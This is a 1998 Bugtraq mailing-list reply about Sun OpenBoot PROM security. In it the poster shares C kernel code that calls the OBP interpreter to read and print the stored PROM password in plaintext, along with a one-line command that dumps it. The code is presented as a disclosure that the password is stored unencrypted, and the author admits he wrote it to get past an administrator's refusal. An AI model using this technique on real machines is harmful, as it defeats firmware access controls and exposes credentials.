[7260] in bugtraq
Re: Regarding Mudge's OBP/FORTH root hack (PHRACK53)
daemon@ATHENA.MIT.EDU (Leendert van Doorn)
Tue Jul 14 14:52:27 1998
Date: Mon, 13 Jul 1998 16:30:07 -0400
Reply-To: leendert@WATSON.IBM.COM
From: Leendert van Doorn <leendert@WATSON.IBM.COM>
X-To: James Bonfield <jkb@MRC-LMB.CAM.AC.UK>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: Your message of "Mon, 13 Jul 1998 09:22:11 BST."
<9807130822.AA30702@arran>
# Jericho Nunn wrote:
#
# > Aside from the fact that it left me quite flabbergasted for quite
# >some time, mudge's OBP memory manipulation for aquiring root priviledges
# >poses a serious risk for environments where SUN workstation consoles are
# >easily accesible to unpriviledged individuals, such as university labs.
#
# This has been known for a long time. Indeed some 7 years ago whilst I
# was at univeristy, and in my more "cat and mouse" gaming moods, I used
# this trick and a prom password was promptly added.
Given that we are on the subject of open boot prom passwords. Because of
a disagreement with the person that managed the pool of Sparc stations
we ran Amoeba on (he didn't want to give me the prom password but I was
allowed to boot my own kernels), my own kernels contained the following
piece of code:
#ifndef NDEBUG
/*
* Print the prom password so I know what it is when debugging a kernel
*/
void
print_password(void)
{
char cmd[OBP_CMDLEN], pwd[8];
int i, pwdlen;
preprom();
if (obp->op_interpret) {
(void) sprintf(cmd,
"security-password %x swap dup %x ! move", pwd, &pwdlen);
obp->op_interpret(cmd);
if (pwdlen > 0) {
printf("OBP Password = '");
for (i = 0; i < pwdlen; i++)
printf("%c", pwd[i]);
printf("'\n");
}
}
postprom();
}
#endif /* NDEBUG */
Yes, the prom password is unencrypted. "security-password dump" will
show the plaintext version.
Leendert
--
Leendert van Doorn <leendert@watson.ibm.com>
IBM T.J. Watson Research Center (914) 784-7831
30 Saw Mill River Road, Hawthorne, NY 10532
